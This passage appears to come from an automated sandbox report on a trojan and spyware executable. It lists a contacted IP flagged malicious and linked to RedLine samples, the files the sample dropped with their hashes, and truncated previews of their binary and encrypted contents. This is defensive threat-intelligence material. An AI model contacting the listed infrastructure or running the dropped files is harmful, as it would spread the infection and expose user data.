                      http://schemas.xmlsoap.org/ws/2005/02/trust/RenewRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id11ResponseDRegAsm.exe, 00000014.00000002.2568169273.0000000002829000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id8ResponseRegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2006/02/addressingidentityRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      45.140.147.183
                      		unknownUnited Kingdom
                      		44486SYNLINQsynlinqdeDEtrue

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1483221
                      Start date and time:2024-07-26 21:20:10 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 8m 26s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Run name:Run with higher sleep bypass
                      Number of analysed new started processes analysed:22
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe
                      Detection:MAL
                      Classification:mal72.troj.spyw.evad.winEXE@34/46@1/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 94
                      • Number of non-executed functions: 303
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                      • Stop behavior analysis, all processes terminated

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      15:21:40API Interceptor39x Sleep call for process: Eco.pif modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      45.140.147.1837632e569071acc40bce87af592e4cc2476d9c088906a1.exeGet hashmaliciousRedLineBrowse

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        SYNLINQsynlinqdeDE7632e569071acc40bce87af592e4cc2476d9c088906a1.exeGet hashmaliciousRedLineBrowse
                        • 45.140.147.183
                        3wdC6zhiOR.exeGet hashmaliciousMicroClipBrowse
                        • 45.140.146.248
                        3wdC6zhiOR.exeGet hashmaliciousMicroClipBrowse
                        • 45.140.146.248
                        HajjReport.docmGet hashmaliciousUnknownBrowse
                        • 45.140.147.81
                        HajjReport.docmGet hashmaliciousUnknownBrowse
                        • 45.140.147.81
                        HajjReport.docmGet hashmaliciousUnknownBrowse
                        • 45.140.147.81
                        HajjReport.docmGet hashmaliciousUnknownBrowse
                        • 45.140.147.81
                        https://coanj.com/Get hashmaliciousUnknownBrowse
                        • 45.140.146.101
                        https://stay.linestoget.com/scripts/get.js?ver=4.2.1Get hashmaliciousUnknownBrowse
                        • 45.140.146.101

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Program Files (x86)\StrLocalGate\Setup.exe (copy)

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):1750211
                        Entropy (8bit):7.15738162690574
                        Encrypted:false
                        SSDEEP:24576:Y4nXubIQGyxbPV0db26Kn54SqBIvEYDSp9r0327fkcZKq:Yqe3f6+abK8RXr0G7fkcMq
                        MD5:1C83CFBC97F7BC13E849E9E1AF8E7DA7
                        SHA1:6E282C51B6AD9FD4ABEB5A1AE8A02C3768F4947B
                        SHA-256:AFFB554F0E0AC980517EACD5CB576F0D0CA24FCEED6D874B33D6E252AADCAA0E
                        SHA-512:EEC5FB6DEE7D26579205EB481760239A5FDA74A3E886E8E3634A01127F62C4F5B7AB696ABCEC11A56D7DFC6B0ED66CD1A1CAFE81422E0D333740BEE867E9CE21
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...'..`.................P...........^.......p....@.......................................@......@...................@....... ..6....p...f...................................................`......................."..D....0.......................text....6.......8.................. ..`.itext.......P.......<.............. ..`.data....7...p...8...T..............@....bss.....m...............................idata..6.... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc....f...p...h..................@..@....................................@..@........................................................

                        C:\Program Files (x86)\StrLocalGate\is-RI2MT.tmp

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):1750211
                        Entropy (8bit):7.15738162690574
                        Encrypted:false
                        SSDEEP:24576:Y4nXubIQGyxbPV0db26Kn54SqBIvEYDSp9r0327fkcZKq:Yqe3f6+abK8RXr0G7fkcMq
                        MD5:1C83CFBC97F7BC13E849E9E1AF8E7DA7
                        SHA1:6E282C51B6AD9FD4ABEB5A1AE8A02C3768F4947B
                        SHA-256:AFFB554F0E0AC980517EACD5CB576F0D0CA24FCEED6D874B33D6E252AADCAA0E
                        SHA-512:EEC5FB6DEE7D26579205EB481760239A5FDA74A3E886E8E3634A01127F62C4F5B7AB696ABCEC11A56D7DFC6B0ED66CD1A1CAFE81422E0D333740BEE867E9CE21
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...'..`.................P...........^.......p....@.......................................@......@...................@....... ..6....p...f...................................................`......................."..D....0.......................text....6.......8.................. ..`.itext.......P.......<.............. ..`.data....7...p...8...T..............@....bss.....m...............................idata..6.... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc....f...p...h..................@..@....................................@..@........................................................

                        C:\StrLocalGate\MmReveals.exe (copy)

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):975909
                        Entropy (8bit):7.977422924365237
                        Encrypted:false
                        SSDEEP:24576:oXwOyoMvAJeqI8X6aGvX2T8NZrymq1I1bYSLsbUAYilGEADGKel:bFvAJeq7KmQ/rymq6YSLsbDdrqGKel
                        MD5:5223A85FF161E8818F0E514048051E7D
                        SHA1:9574D384A9F3B449F64CF14A022DF3C8C383E279
                        SHA-256:7632E569071ACC40BCE87AF592E4CC2476D9C088906A1E6651614860B4754BF8
                        SHA-512:A7860963EA26BE9A3F41AEA30BACE94211BFE36D249062D1B91833A2675C4DDF7C60387BC0C167A484DA4F228DE382B8A0D054EDAFE49D59080452C601E8A950
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 39%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8............@.......................................@.................................4........@...A..............x)......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc....A...@...B..................@..@.reloc..2...........................@..B................................................................................................................................................................................................................................................................................................................

                        C:\StrLocalGate\is-RISCU.tmp

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):975909
                        Entropy (8bit):7.977422924365237
                        Encrypted:false
                        SSDEEP:24576:oXwOyoMvAJeqI8X6aGvX2T8NZrymq1I1bYSLsbUAYilGEADGKel:bFvAJeq7KmQ/rymq6YSLsbDdrqGKel
                        MD5:5223A85FF161E8818F0E514048051E7D
                        SHA1:9574D384A9F3B449F64CF14A022DF3C8C383E279
                        SHA-256:7632E569071ACC40BCE87AF592E4CC2476D9C088906A1E6651614860B4754BF8
                        SHA-512:A7860963EA26BE9A3F41AEA30BACE94211BFE36D249062D1B91833A2675C4DDF7C60387BC0C167A484DA4F228DE382B8A0D054EDAFE49D59080452C601E8A950
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 39%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8............@.......................................@.................................4........@...A..............x)......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc....A...@...B..................@..@.reloc..2...........................@..B................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):3094
                        Entropy (8bit):5.33145931749415
                        Encrypted:false
                        SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
                        MD5:3FD5C0634443FB2EF2796B9636159CB6
                        SHA1:366DDE94AEFCFFFAB8E03AD8B448E05D7489EB48
                        SHA-256:58307E94C67E2348F5A838DE4FF668983B38B7E9A3B1D61535D3A392814A57D6
                        SHA-512:8535E7C0777C6B0876936D84BDE2BDC59963CF0954D4E50D65808E6E806E8B131DF5DB8FA0E030FAE2702143A7C3A70698A2B9A80519C9E2FFC286A71F0B797C
                        Malicious:false
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                        C:\Users\user\AppData\Local\Temp\154571\Eco.pif

                        Download File
                        Process:C:\Windows\SysWOW64\cmd.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:modified
                        Size (bytes):937776
                        Entropy (8bit):6.777413141364669
                        Encrypted:false
                        SSDEEP:12288:FJV3REMvnCG22lhtjVoAYxQl+u13a/sVyaVeK56ORMkkOlPlNKlga4Umff2lRO:F3hEW3hlVodGl+gUKrMkzXa4P6RO
                        MD5:B06E67F9767E5023892D9698703AD098
                        SHA1:ACC07666F4C1D4461D3E1C263CF6A194A8DD1544
                        SHA-256:8498900E57A490404E7EC4D8159BEE29AED5852AE88BD484141780EAADB727BB
                        SHA-512:7972C78ACEBDD86C57D879C12CB407120155A24A52FDA23DDB7D9E181DD59DAC1EB74F327817ADBC364D37C8DC704F8236F3539B4D3EE5A022814924A1616943
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...y..U..........".................*.............@.................................w.....@...@.......@.....................L...|....................8..0....0...q...;..............................@X..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...............................@..@.reloc...q...0...r..................@..B................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\154571\Eco.pif
                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):65440
                        Entropy (8bit):6.049806962480652
                        Encrypted:false
                        SSDEEP:768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
                        MD5:0D5DF43AF2916F47D00C1573797C1A13
                        SHA1:230AB5559E806574D26B4C20847C368ED55483B0
                        SHA-256:C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                        SHA-512:F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......

                        C:\Users\user\AppData\Local\Temp\154571\i

                        Download File
                        Process:C:\Windows\SysWOW64\cmd.exe
                        File Type:OpenPGP Secret Key
                        Category:dropped
                        Size (bytes):410350
                        Entropy (8bit):7.999534336762385
                        Encrypted:true
                        SSDEEP:6144:PHCFfAFqXYJsA48LxAI5YIzjmWCQLW9MnP+YC6WCdibeQEEmOiylZAZv57Q0QHeI:P4foqX4so5YsuXKkwOzgv5Q0Y
                        MD5:AFA99B9D405658F98DE0E2F688B11799
                        SHA1:7387C5ACA57800C29BCB994BF9910B47AC8E3A3E
                        SHA-256:923EAAAEE7BD9310AD06297C07FBBFBD4801A1AC30DA2DE21FB59FF28F958936
                        SHA-512:35886B244E6D04FC7B199762944B4906E16CB8D4285E9BD70532A592C8F90E1232E51C34D9D80334BF4DA86264A5EDA429A37FE423A85C14441476F2DC4C0212
                        Malicious:false
                        Preview:.2.....u....K.wET."v._.3.P.;.4VFv....Q...q.......P.S.AfK.TKkX......j%.E.k..d&.3..)o...5...A....R...H{..o.F.x.[s..Kt.Q+'....}>.....G.. H...RM...B..Egs._......0#...2..,....@.....D.OGP0.T..B...../.pB./2.e.......J.b..=...~....4.`....).}...%6......h.S..]....j.0...!..S+RP...1$.R.aU..6`d.*Y%Yx.....;..(.?. ..a...[.N...C....*e/9.SP-...-k.?v....+...".....&5.9.BR.t......L...9A.:...1a,....6.^M...C..v..G..*.{.....(\!.G.......3.....!........C._n.g...).{Y,6.L!g.k...C.P8...h<..n.;{.. 0.._...M.+..a._<.....%...j...U#mo..;..E..N..p..f..rrc........Z.+....,$#%h...B.PR..S..c..(!.]....:~.L.vs......4..HW.S.'.(*?..N7\a.O.....:w.....9[...._".....{...8...sP.I.1..2..".2.<.js..U.....}..hB.&tT.'.Y/.lu.U.#i>...PE`iS................{,.LaZ...]$L...%...<...N..S.#."...=_.sZ$..?.6.+.!WEv.S....-.l..M/.=p.Jf+...Z.'...;.;.e....%[....\}.....J...kv.....7.1.....o...e.q..1y2.].|-.L,...d7._.h..c.EoC0.f..B\.}ix2_w.?l.!~.*..D.3.c.xx.L62.(b.0...-X."...$.N.i..J.l}h..D.*`....C...

                        C:\Users\user\AppData\Local\Temp\Allah

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):38912
                        Entropy (8bit):6.504850481956066
                        Encrypted:false
                        SSDEEP:768:K9Fsqib9futLZzWaIxyKw7nxZL96Yk4iARefFilP4Bwh1QwTMvcB:K9FskzWaIxOv/pAfkF/bI8
                        MD5:FA50D208824BED4A28326CB5138B546B
                        SHA1:023558C179E428CBA689D5E3B782FDFE2E962386
                        SHA-256:BA6B5B6F433B1D99D0023BB25EBC0040CBE328809075E0ED7131FC89FDDFCD8B
                        SHA-512:870DB5CD25F559A7BA3FE9414346E5CEA7063F431334E94B719FEEB0B82919A5B55CEC2083BCAA0C072B35366A2FE9088BF48C70B91B84A7C34334F99E59ED79
                        Malicious:false
                        Preview:.u .u..u.QP.u.WVS.K....e...u$.u .u..u.QP.u.WVS....e...u$.u .u..u.QP.u.WVS.....}e...u$.u .u..u.QP.u.WVS......_e...u$.u .u..u.QP.u.WVS....Ae...u$.u .u..u.QP.u.WVS.....#e...u$.u .u..u.QP.u.WVS.....e......E,..P.a...C....u$.u .u..u..u..u..u.WVS.......d...u$.u .u..u.QPQWVS.d....d...u$.u .u..u.QPQWVS....d...M,...PQ.u .u..u..u..u..u.WVS.9....pd...u..u.WVS.....]d...u$.u .u..u.QPQWVS.....Ad...u.WVS....1d...u..u..u.WVS.O.....d...u.QVS.x.....d...u..u..u..u.WVS.e.....c...u$.u .u..u.QPQWVS.......c...u..u.WVQ.......c...u$.u .u..u.QP.u.WVS....c...u$.u .u..u.QP.u.WVS......c...u$.u .u..u.QP.u.WVS....ic...u$.u .u..u.QP.u.WVS....Kc...u$.u .u..u.QP.u.WVS....-c...u..u.WVQ.......c...u$.u .u..u.QP.u.QVS.....b..W..gL...Y...}..u..E.3.f9...x...3..t...3.9Cpu'.{|Uu!..........u.9.....u...........b..P.......Cl.............s|PVS.7....M(.b...}..t..}.....b...6..(.I...3.PPj1.6.E ....I..=..I.PS..U....E..P.!|..YVS..u.S.6..$.I..E....t'Ht.Ht.Hu&.U.M.... .U.M......M......M.U....M ..

                        C:\Users\user\AppData\Local\Temp\April

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):56320
                        Entropy (8bit):6.3605894597604715
                        Encrypted:false
                        SSDEEP:768:oR3Sh7WscONK1dvq6LqgaHbdMNkNDUySdK8M4INduPbOUGM4INduPbOU+aI4kSm+:e3SdFc9vtmgMbFuyO1MBNfMBNB+x
                        MD5:3F6F218E3E0971ECB99CAAA2958B354B
                        SHA1:A15C014857BF63F17ADA6BA6262F54D211BC048C
                        SHA-256:92F9D5FC75BF7F912C816E54F1AD7D90D5525029CEF5963F6C553F3D450C8CDF
                        SHA-512:7ED3311383E2FFA611213AEE10E2202BA7887FB7F06A555234BADBC64B2AC3BD010A993247CF49892FD6158B599B695E6ACC3DAEBC9BDB77CE2BBD157C026CE6
                        Malicious:false
                        Preview:N.G.E.T.P.R.O.C.E.S.S...W.I.N.G.E.T.S.T.A.T.E...W.I.N.G.E.T.T.E.X.T.....W.I.N.G.E.T.T.I.T.L.E...W.I.N.K.I.L.L...W.I.N.L.I.S.T...W.I.N.M.E.N.U.S.E.L.E.C.T.I.T.E.M...W.I.N.M.I.N.I.M.I.Z.E.A.L.L.....W.I.N.M.I.N.I.M.I.Z.E.A.L.L.U.N.D.O.....W.I.N.M.O.V.E...W.I.N.S.E.T.O.N.T.O.P...W.I.N.S.E.T.S.T.A.T.E...W.I.N.S.E.T.T.I.T.L.E...W.I.N.S.E.T.T.R.A.N.S...W.I.N.W.A.I.T...W.I.N.W.A.I.T.A.C.T.I.V.E...W.I.N.W.A.I.T.C.L.O.S.E.....W.I.N.W.A.I.T.N.O.T.A.C.T.I.V.E.....[:>:]]..[:<:]]..Q\E...E.7.E...C...C.W.M._.G.E.T.C.O.N.T.R.O.L.N.A.M.E...\.....G...C...C.A.u.t.o.I.t......F.S.o.f.t.w.a.r.e.\.A.u.t.o.I.t. .v.3.\.A.u.t.o.I.t....F.%s..#.c.o.m.m.e.n.t.s.-.s.t.a.r.t...#.c.s...#.c.o.m.m.e.n.t.s.-.e.n.d...#.c.e...d.0.b.....C...C...C.C.A.L.L.....D.L.L.C.A.L.L.B.A.C.K.R.E.G.I.S.T.E.R...D.R.I.V.E.G.E.T.F.I.L.E.S.Y.S.T.E.M.....A.U.T.O.I.T.W.I.N.S.E.T.T.I.T.L.E...A.U.T.O.I.T.W.I.N.G.E.T.T.I.T.L.E...C.O.N.S.O.L.E.W.R.I.T.E.E.R.R.O.R...D.L.L.C.A.L.L.B.A.C.K.G.E.T.P.T.R...D.L.L.S.T.R.U.C.T.G.E.T.D.A.T.A.....D.L.L.S.

                        C:\Users\user\AppData\Local\Temp\Bass

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:OpenPGP Public Key
                        Category:dropped
                        Size (bytes):61440
                        Entropy (8bit):4.95323177323416
                        Encrypted:false
                        SSDEEP:384:JGiwxFr9LE/MpfhwHLWAkqLyH3Per2Wfn2HuboETcKiKjxq/l1qIvtx4MjNyREl:JG5bAGWrT+UTcL4qHq25NKEl
                        MD5:B9C92C528AAC10D5D9520D157CBDDC57
                        SHA1:8F1DE21B9910F1F5601AD1828A47414F4A8CA3DE
                        SHA-256:12494B11637277961825098976E7F789AA099CD65A4AEA3616D23E0549F8C960
                        SHA-512:B4807E4BC67C859D724A9E83F79D611F8ED6617469BBE86542872F64E53E4B98C7F12CB15C9DE7A67BCB3421C5E2E93F850EA35CA5DAFA8F5E83C43B196C83BD
                        Malicious:false
                        Preview:............................................................................................................................................................................................................................m.m.m.m.m...........................................................................................m...m.m.m.m.m...m.m.................................................................................................................m.m.m.m.m.m.m.....m.m.m.m.m.m.m.m.m.m.m.m.m.m...4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.m.m.m.m.m.m.m.m.m.4.4.4.4.4.4.4.m.4.4.4.4.4.4.4.m.4.4.4.4.4.4.4.m.4.4.4.4.4.4.4.m.4.4.4.4.4.4.4.m.4.4.4.4.4.4.4.m.4.4.4.4.4.4.4.m.4.4.4.4.4.4.4.m...............................................................................................................................................................f.........................m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.

                        C:\Users\user\AppData\Local\Temp\Blake

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):186368
                        Entropy (8bit):7.998911837050045
                        Encrypted:true
                        SSDEEP:3072:M7jI9Dh8XC3AL6eQd7xMnPE2f2g+aK1h/XAc569WbediWo2NQEEp0Oiy0AZAZnvv:4jmWCQLW9MnP+YC6WCdibeQEEmOiylZG
                        MD5:F895D0C5DA4CF4B1A053B28CC3D11957
                        SHA1:D3CC81C1EF60E924505F805CF188A158AAB05D63
                        SHA-256:40BAE31C25DB506601F9C69A11F16227E45124724C7E7E39D1BE7258333F31D9
                        SHA-512:1FA814ECAEFD596D2F088E1CFE4B9FBEE7F67E0FD4D65452D13578E4345120F651453D690B56582E680F0FF240DA13A93A317CED7A5CE858D9837C2DBD0997DD
                        Malicious:false
                        Preview:MC...Y.......Xy;.4....E|1..%{.....47...w).j.{O.W.c...G..p.E.T.C:Zt...y5{a..../.P.*.....h.........V...A..F.:[.S......3.`..bo.%.~)...p....E.M.TFZ.....Af....#..r5.-b>.../.....i......7..C..[aj4..,..d....x.1B..m..E........{...2.0m.6......._.bP2`...".]~...N..u.Y..e@x.......XX...O-.y7[...z...u....l...X&-/...$"....i>j_..]OL,......1..#.l.s..u}......nx..V..`......X...&.nY.~._.1...U..X..OPB...q..!...[.$.[...A."6..:....*..+.......D.#.!Zm..(.&...+...>.u..~W..L..P#\}....Qz...l.nCQ..O.....(M.rr..D..C....KS....pf..?.~t.|..2.p.kF.....LCd...I.....YV...{...<2..iwi.:).g1.S..8i........Q.N.k..N.V..Y3."b.J..+ .}.."..-...t...-......._...t.X..?Gf..o.4.On..m;3..T...B..P.........$~uG{..<.....,..o...}..Q.S...m......J...')%....Tv.:...d....h...K?oG6 Q.D.Z..F ...m=.j..i..].......?...s.n.$..7I.?.m...hL)Em\...R....T..Cb.z...!......U?H:.m.y..dz.i.b.....7L...X7..hJB.g%9.Q......$.C%.E.ML..+.Ik.U#.u..F6.<b.`c.."z_ .3.......`p,,S.....20.....3....C.3 .9.E.$4m.@..).......&G]{...

                        C:\Users\user\AppData\Local\Temp\Category

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):23278
                        Entropy (8bit):7.990246299434285
                        Encrypted:true
                        SSDEEP:384:PiH1txr3Hp/f0lJoBBucnUmu/gQ4p8uzKGVbwMI+pwjJb4q1/WlZHfT7PLV:aH1txTHNuoBBuqU1gwu/IMwjV5U/T7Z
                        MD5:744D957358190ED5E658E5410EFFB89A
                        SHA1:8C2235E8EFFB359C0F1D53768A0FA44CF93AE63F
                        SHA-256:BE303E92319DF05E83E93B6C632F2476EE9AF84F5D5A3DEFDE788D94FB4505D3
                        SHA-512:46CC1DEC09013EF03FC4B794A2B1CBA1667D3E00FB3D740BD662E342A7D9CB108F74AA83BFE6C96F5EC6F106428434E6255F462103D4CC5FA5A828E9FDEF2CFA
                        Malicious:false
                        Preview:...........m..%.F......4T1.g.....,.`.^O.O....%1..<J.I...z...)J..:w..XA...M:.C.......}lE....U.L.....P.;z....._.-^j..&.FG,.......S....J....t..?..~@."..2..V..A.t..&.....g....a...-L......D.T#.R.{$.&.B..W..IN.'.)..M.#d..<..F>.Ox.Oa}.J.d......,^<>....G...+..`]I9.9..3yp.C.u......./.2.0.kG..EjM.C.^..+ZOR.........OV...x....X.i..QC[Be..O..].#&..-..;...3.g`..8.....B.....Bx!M....b^R.'KX.8lwg0...G...G.g..r.K.Z..+...=x.z -..pW..\..=P.x.8..J.AU.4M...4.....mTpI.+.u ..g...j6..%.'.`.....R>`..B........p....../.0.+jy.)..,.+........../......t8.....H....I.pm..o.!.......Z...X.$.U).KC..Da.4.q.j9g.U.D.:...*../X`...ZW.U.K.Jcb.ah....f.u..."wy...E.Iu.{,...T%~8.(...K.d...; ...2e.N..?.HZ....(-R.....C......7nrX.".xY)........6..C.Qr..B.(u..R.na1...O...K...q..1..Me.xu......x..B.O..g..b6..b;.....,.v.....}...`.0..'.A.".M......W.nvo.....q.h...$......2.~...&#~.5.an...I`.[....Cj...\.n.....S.}..!.v8$....j...'......BB..P.:..<..}....A..(..F$..X....Ny.B<....o.(!..].=..

